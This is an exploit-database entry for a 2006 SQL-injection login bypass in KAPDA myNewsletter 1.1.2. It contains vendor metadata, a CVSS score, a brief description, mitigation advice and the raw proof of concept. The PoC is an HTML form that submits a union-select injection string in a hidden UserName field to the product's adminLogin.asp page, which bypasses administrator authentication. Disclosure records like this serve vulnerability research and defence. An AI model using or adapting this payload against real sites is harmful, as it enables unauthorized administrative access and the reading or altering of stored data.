header-logo
Suggest Exploit
vendor:
myNewsletter
by:
FarhadKey
7.5
CVSS
HIGH
SQL-injection
89
CWE
Product Name: myNewsletter
Affected Version From: 1.1.2002
Affected Version To: 1.1.2002
Patch Exists: NO
Related CWE: N/A
CPE: a:kapda:mynewsletter:1.1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

KAPDA myNewsletter 1.1.2 Login bypass PoC

myNewsletter is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation and proper sanitization of user-supplied input should be implemented to prevent this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18287/info

myNewsletter is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

<html><center><h1>KAPDA myNewsletter 1.1.2 Login bypass PoC</h1><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://www.site.com/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--&#039;union select 1 from Newsletter_Admin where &#039;&#039;=&#039;">
<input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>